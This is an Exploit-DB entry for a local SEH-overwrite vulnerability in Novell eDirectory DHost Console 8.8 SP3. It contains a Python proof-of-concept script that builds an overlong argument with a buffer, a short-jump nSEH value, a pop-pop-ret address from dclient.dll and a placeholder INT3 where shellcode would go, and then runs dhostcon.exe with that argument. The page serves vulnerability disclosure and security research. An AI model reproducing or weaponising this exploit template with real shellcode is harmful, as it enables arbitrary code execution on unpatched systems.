Novel eDirectory DHost Console 8.8 SP3 - Local Overwrite (SEH)

EDB-ID:

15267

CVE:

N/A

EDB Verified:

Author:

d0lc3

Type:

dos

Exploit:   /  

Platform:

Windows

Date:

2010-10-17

Vulnerable App: 
# Exploit Title: 	Novel eDirectory DHost Console 8.8 SP3 Local SEH Overwrite
# Date: 		17/10/2010 
# Author: 		d0lc3	 (@rmallof - http://elotrolad0.blogspot.com/)
# Software Link: 	http://www.novell.com/
# Version: 		8.8 SP3 (20216.67)]
# Tested on: 		win32 xp sp3 (spa)

#Summary:
#	DHostCon.exe is prone to local denial of service caused by stack overflow
#	triggered if user-supplied parameters are too long (1074 bytes).
#	Due nature of this vulnerabilty, attackers could exploit this issue
#	to execute arbitrary code on local host.

#PoC:

#!/usr/bin/python
import os,struct

def main():
	path="C:\Novell\NDS\dhostcon.exe"	
	args="x.x.x.x"				#ip server
	buf="A"*1065
	nseh=struct.pack("<L",0x90909eeb)	#jmp short 0012ff50 +NOP + NOP
	seh=struct.pack("<L",0x61012c20)	#PPR dclient.dll
	
	shellcode=struct.pack("<B",0xCC)	#INT3

	crash=buf+shellcode+nseh+seh

	os.system(path+" "+args+" "+crash)	#Crash!

if __name__=="__main__":
	main()
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services